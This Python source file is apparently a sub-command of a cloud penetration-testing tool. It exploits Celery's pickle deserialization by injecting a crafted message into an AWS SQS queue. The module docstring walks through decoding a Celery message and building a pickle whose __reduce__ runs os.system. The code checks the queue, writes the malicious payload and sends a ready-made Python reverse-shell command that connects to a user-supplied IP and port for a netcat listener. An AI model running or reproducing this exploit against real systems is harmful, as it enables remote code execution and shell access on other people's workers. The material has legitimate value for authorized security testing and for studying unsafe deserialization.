'''
This comment holds the basics behind the exploit. Don't remove!

In the SQS queue we'll find a message holding this information:

eyJib2R5IjogImdBSjljUUVvVlFkbGVIQnBjbVZ6Y1FKT1ZRTjFkR054QTRoVkJHRnlaM054QkZnZE
FBQUFhSFIwY0RvdkwyaDBkSEJpYVc0dWIzSm5MM1Z6WlhJdFlXZGxiblJ4QllWeEJsVUZZMmh2Y21S
eEIwNVZDV05oYkd4aVlXTnJjM0VJVGxVSVpYSnlZbUZqYTNOeENVNVZCM1JoYzJ0elpYUnhDazVWQW
1sa2NRdFZKREF4TXpKa05XRm1MV1JtWVdZdE5ESXlOUzA1TURKbExXTmhNR1ZpT0RneVptVmlaSEVN
VlFkeVpYUnlhV1Z6Y1ExTEFGVUVkR0Z6YTNFT1ZSTndjbTk0ZVM1MFlYTnJjeTVzYjJkZmRYSnNjUT
lWQTJWMFlYRVFUbFVHYTNkaGNtZHpjUkY5Y1JKMUxnPT0iLCAiaGVhZGVycyI6IHt9LCAiY29udGVu
dC10eXBlIjogImFwcGxpY2F0aW9uL3gtcHl0aG9uLXNlcmlhbGl6ZSIsICJwcm9wZXJ0aWVzIjogey
Jib2R5X2VuY29kaW5nIjogImJhc2U2NCIsICJkZWxpdmVyeV9pbmZvIjogeyJwcmlvcml0eSI6IDAs
ICJyb3V0aW5nX2tleSI6ICJjZWxlcnkiLCAiZXhjaGFuZ2UiOiAiY2VsZXJ5In0sICJkZWxpdmVyeV
9tb2RlIjogMiwgImRlbGl2ZXJ5X3RhZyI6ICI2MTlhMjA4Ny05Mjg1LTQzNGYtYTlkNC02ZDM2ZGNi
NzJkNjcifSwgImNvbnRlbnQtZW5jb2RpbmciOiAiYmluYXJ5In0

After one base64 decode we get the following information:

{"body": "gAJ9cQEoVQdleHBpcmVzcQJOVQN1dGNxA4hVBGFyZ3NxBFgdAAAAaHR0cDovL2h0dHBi
          aW4ub3JnL3VzZXItYWdlbnRxBYVxBlUFY2hvcmRxB05VCWNhbGxiYWNrc3EITlUIZXJy
          YmFja3NxCU5VB3Rhc2tzZXRxCk5VAmlkcQtVJDAxMzJkNWFmLWRmYWYtNDIyNS05MDJl
          LWNhMGViODgyZmViZHEMVQdyZXRyaWVzcQ1LAFUEdGFza3EOVRNwcm94eS50YXNrcy5s
          b2dfdXJscQ9VA2V0YXEQTlUGa3dhcmdzcRF9cRJ1Lg==",
 "headers": {}, "content-type": "application/x-python-serialize", 
 "properties": {"body_encoding": "base64",
                "delivery_info": {"priority": 0,
                                  "routing_key": "celery",
                                  "exchange": "celery"},
                "delivery_mode": 2,
                "delivery_tag": "619a2087-9285-434f-a9d4-6d36dcb72d67"},
 "content-encoding": "binary"}

Base64 decoding the body we get:

\x80\x02}q\x01(U\x07expiresq\x02NU\x03utcq\x03\x88U\x04argsq\x04X\x1d\x00\x00
\x00http://httpbin.org/user-agentq\x05\x85q\x06U\x05chordq\x07NU\tcallbacksq
\x08NU\x08errbacksq\tNU\x07tasksetq\nNU\x02idq\x0bU$0132d5af-dfaf-4225-902e-
ca0eb882febdq\x0cU\x07retriesq\rK\x00U\x04taskq\x0eU\x13proxy.tasks.log_urlq\x0f
U\x03etaq\x10NU\x06kwargsq\x11}q\x12u.

Which when unpickled is:

>>> pickle.loads('\x80\x02}q\x01(U\x07expiresq\x02NU\x03utcq\x03\x88U\x04argsq
                  \x04X\x1d\x00\x00\x00http://httpbin.org/user-agentq\x05\x85q
                  \x06U\x05chordq\x07NU\tcallbacksq\x08NU\x08errbacksq\tNU\x07
                  tasksetq\nNU\x02idq\x0bU$0132d5af-dfaf-4225-902e-ca0eb882feb
                  dq\x0cU\x07retriesq\rK\x00U\x04taskq\x0eU\x13proxy.tasks.log
                  _urlq\x0fU\x03etaq\x10NU\x06kwargsq\x11}q\x12u.')

{'utc': True, 'chord': None, 'args': (u'http://httpbin.org/user-agent',),
 'retries': 0, 'expires': None, 'task': 'proxy.tasks.log_url',
 'callbacks': None, 'errbacks': None, 'taskset': None, 'kwargs': {},
 'eta': None, 'id': '0132d5af-dfaf-4225-902e-ca0eb882febd'}

So, if we want to create a body that is valid but when decoded will run an
arbitrary command, we can use the following:

import pickle
import os
 
class RunCmd(object):
  def __reduce__(self):
    return (os.system, ('/bin/ls',))

data = {'utc': True, 'chord': None, 'args': (u'http://httpbin.org/user-agent',),
        'retries': 0, 'expires': None, 'task': 'proxy.tasks.log_url',
        'callbacks': None, 'errbacks': None, 'taskset': None, 'kwargs': {},
        'eta': None, 'id': '0132d5af-dfaf-4225-902e-ca0eb882febd',
        'payload':RunCmd()}

raw = pickle.dumps(data)
pickle.loads(raw) # /bin/ls is run
'''

import base64
import pickle
import os
import json
import logging
import sys

import boto.sqs

from boto.sqs.connection import SQSConnection
from boto.sqs.message import Message

from core.common_arguments import add_region_arguments, add_credential_arguments


def is_vulnerable_sqs_queue(queue):
    '''
    Peek at one message of the SQS queue and decide if it looks exploitable.

    Returns True when either:
        * The queue returned no messages, or
        * The first message returned looks like a Celery message (see
          is_celery_message)

    The empty-queue case seems strange, but in many cases it's NOT
    possible to determine if something is vulnerable because the workers
    consume the messages very fast and we can't find any messages, ever.

    NOTE: the serializer announced by the message ("content-type") is not
    inspected here, so a True result does not prove that pickle is in use.

    :param queue: The SQS queue instance as returned by boto
    :return: True if the queue is empty or holds a Celery-looking message,
             False otherwise. The process exits with status 1 if the queue
             can not be read.
    '''
    try:
        messages = queue.get_messages(1)
    except Exception as e:
        # Not every exception carries an "error_message" attribute; fall
        # back to the exception itself so the handler can never raise an
        # AttributeError of its own.
        reason = getattr(e, 'error_message', e)
        logging.critical('Failed to read messages from SQS queue: "%s"' % (reason,))
        sys.exit(1)

    if not messages:
        # See docstring for more info about this case
        return True

    body = messages[0].get_body()
    return is_celery_message(body)
    
def is_celery_message(message_body):
    '''
    Check if a raw SQS message body has the shape of a Celery message.

    The body must be a JSON object that contains both the "body" and the
    "content-encoding" keys. Anything that is not valid JSON, or that is
    valid JSON but not an object (a list, a string, a number...), is
    rejected.

    :param message_body: The message body as read from the SQS queue
    :return: True if this is a celery message
    '''
    try:
        json_decoded = json.loads(message_body)
    except (TypeError, ValueError):
        # TypeError: the body is not a string; ValueError: invalid JSON
        return False

    # Explicit checks instead of "assert": asserts are stripped when python
    # runs with -O, which would make every valid JSON document match. The
    # dict check prevents lists/strings from satisfying the "in" tests.
    if not isinstance(json_decoded, dict):
        return False

    return 'body' in json_decoded and 'content-encoding' in json_decoded

def can_write_to_sqs(queue):
    '''
    Check write access by sending a small test message to the queue.

    Note that the test message ('The test message') is written to the
    queue and is not removed by this function.

    :param queue: The SQS queue instance as returned by boto
    :return: True if the message could be written to the SQS queue, False
             if the write raised an exception
    '''
    m = Message()
    m.set_body('The test message')

    try:
        queue.write(m)
    except Exception as e:
        # Not every exception carries an "error_message" attribute; fall
        # back to the exception itself so the handler can never raise an
        # AttributeError of its own.
        reason = getattr(e, 'error_message', e)
        logging.critical('Failed to write a message to SQS queue: "%s"' % (reason,))
        return False

    return True

def send_payload_to_sqs(queue, command):
    '''
    Wrap :command: in a message built by generate_sqs_message() and write
    it to the SQS queue.

    :param queue: The SQS queue instance as returned by boto
    :param command: The command string handed to generate_sqs_message()
    :return: Whatever queue.write() returned for the message
    '''
    body = generate_sqs_message(command)

    payload_message = Message()
    payload_message.set_body(body)
    write_result = queue.write(payload_message)

    logging.debug('Sent payload to SQS, wait for the reverse connection!')

    return write_result

def generate_sqs_message(command):
    '''
    Build the JSON document that is written to the SQS queue.

    The document has the same envelope as the Celery message shown in the
    module docstring. Its "body" is the base64 encoding of a pickled dict
    which, besides the task fields, holds an extra 'payload' entry whose
    __reduce__ method returns (os.system, (command,)).

    :param command: The command string stored in the 'payload' entry
    :return: A string with the message to send to the SQS queue
    '''
    # Envelope; "body" is filled in below once the pickled body is ready
    MESSAGE = {"body": None,
               "headers": {}, "content-type": "application/x-python-serialize", 
               "properties": {"body_encoding": "base64",
                              "delivery_info": {"priority": 0,
                                                "routing_key": "celery",
                                                "exchange": "celery"},
                              "delivery_mode": 2,
                              "delivery_tag": "619a2087-9285-434f-a9d4-6d36dcb72d67"},
               "content-encoding": "binary"}
    
    # Task description; same fields as the unpickled example in the module
    # docstring
    BODY = {'utc': True, 'chord': None, 'args': (u'http://httpbin.org/user-agent',),
            'retries': 0, 'expires': None, 'task': 'proxy.tasks.log_url',
            'callbacks': None, 'errbacks': None, 'taskset': None, 'kwargs': {},
            'eta': None, 'id': '0132d5af-dfaf-4225-902e-ca0eb882febd'}
    
    class RunCmd(object):
        # Helper whose pickled form is defined by __reduce__ below
        def __init__(self, command):
            self.command = command
            
        def __reduce__(self):
            # pickle stores this (callable, args) pair for the instance
            return (os.system, (self.command,))
        
    BODY['payload'] = RunCmd(command)
    
    # pickle -> base64 -> embed in the envelope -> JSON
    raw_body = pickle.dumps(BODY)
    body_64 = base64.encodestring(raw_body)
    
    MESSAGE['body'] = body_64
    json_message = json.dumps(MESSAGE)
    
    return json_message

def exploit_celery_pickle(conn, queue, ip_address, port, cmd_args):
    '''
    Main entry point for the exploit command.

    Runs the checks in order (is_vulnerable_sqs_queue, can_write_to_sqs) and
    stops at the first one that fails. When both pass it asks the user to
    start a listener, waits for enter and sends the command built by
    reverse_shell() to the queue.

    :param conn: The SQS connection to the specified region (not used here)
    :param queue: The SQS queue instance as returned by boto
    :param ip_address: Address handed to reverse_shell()
    :param port: Port handed to reverse_shell()
    :param cmd_args: Parsed command line arguments; only the "reverse"
                     attribute is read, to show it in the prompt
    '''
    if is_vulnerable_sqs_queue(queue):
        logging.debug('SQS queue %s is vulnerable' % queue.name)
    else:
        logging.debug('SQS queue %s is not vulnerable' % queue.name)
        return

    if can_write_to_sqs(queue):
        logging.debug('We can write to the SQS queue.')
    else:
        logging.debug('We can NOT write to the SQS queue.')
        return

    prompt = 'Start a netcat to listen for connections at %s and press enter.'
    logging.info(prompt % cmd_args.reverse)
    # Block until the user confirms the listener is running
    raw_input()

    send_payload_to_sqs(queue, reverse_shell(ip_address, port))

# Command template; the two %s placeholders take the address and the port.
# It is written on several lines for readability only, reverse_shell() joins
# them before formatting.
REVERSE_SHELL = """\
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("%s",%s));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'"""

def reverse_shell(ip_address, port):
    '''
    Fill the REVERSE_SHELL template with the given address and port.

    :param ip_address: Value for the first placeholder of the template
    :param port: Value for the second placeholder of the template
    :return: The template as a single line (newlines removed) with both
             placeholders replaced
    '''
    single_line = ''.join(REVERSE_SHELL.split('\n'))
    return single_line % (ip_address, port)

def cmd_arguments(subparsers):
    '''
    Register the celery-pickle-exploit sub-command and its arguments.

    :param subparsers: The object on which add_parser() is called to create
                       the sub-command parser
    :return: The same :subparsers: object that was received
    '''
    parser = subparsers.add_parser('celery-pickle-exploit',
                                   help='Exploit unpickle vulnerability in Celery')

    reverse_help = ('Run a payload that will create a reverse shell. Example:'
                    ' --reverse=1.2.3.4:4000')
    parser.add_argument('--reverse', help=reverse_help, required=True)

    queue_help = 'SQS queue name where raw message will be injected.'
    parser.add_argument('--queue-name', help=queue_help, required=True)

    # Region and credential options come from the shared helpers
    add_region_arguments(parser)
    add_credential_arguments(parser)

    return subparsers

def cmd_handler(args):
    '''
    Main entry point for the sub-command.

    Parses the --reverse argument, resolves the region, connects to SQS,
    looks up the queue and hands everything to exploit_celery_pickle().
    Every failure along the way is logged and ends the process with exit
    status 1.

    :param args: The command line arguments as parsed by argparse
    '''
    logging.debug('Starting celery-exploit')

    try:
        ip_address, port = args.reverse.split(':')
        port = int(port)
    except (AttributeError, ValueError):
        # ValueError: not exactly one ':' or a non-numeric port;
        # AttributeError: the argument is not a string
        logging.warning('Invalid reverse connection specification')
        sys.exit(1)

    region_info = get_region_from_name(args.region)

    try:
        conn = SQSConnection(region=region_info,
                             aws_access_key_id=args.access_key,
                             aws_secret_access_key=args.secret_key,
                             security_token=args.token)
    except Exception as e:
        # Not every exception carries an "error_message" attribute
        reason = getattr(e, 'error_message', e)
        logging.critical('Failed to connect to SQS: "%s"' % (reason,))
        sys.exit(1)

    try:
        queue = conn.get_queue(args.queue_name)
    except Exception as e:
        reason = getattr(e, 'error_message', e)
        logging.critical('Failed to get SQS queue in the specified region: "%s"' % (reason,))
        sys.exit(1)

    if queue is None:
        # boto's get_queue() reports a missing queue by returning None
        # instead of raising; stop here rather than failing later on a
        # None object.
        logging.critical('SQS queue "%s" was not found in the specified region' % (args.queue_name,))
        sys.exit(1)

    exploit_celery_pickle(conn, queue, ip_address, port, args)

def get_region_from_name(region_name):
    '''
    Look up the SQS region object whose name equals :region_name:.

    :param region_name: The region name to search for in boto.sqs.regions()
    :return: The first matching region object. If there is no match the
             error is logged and the process exits with status 1.
    '''
    for candidate in boto.sqs.regions():
        if candidate.name != region_name:
            continue
        return candidate

    logging.critical('No SQS region with name "%s"' % region_name)
    sys.exit(1)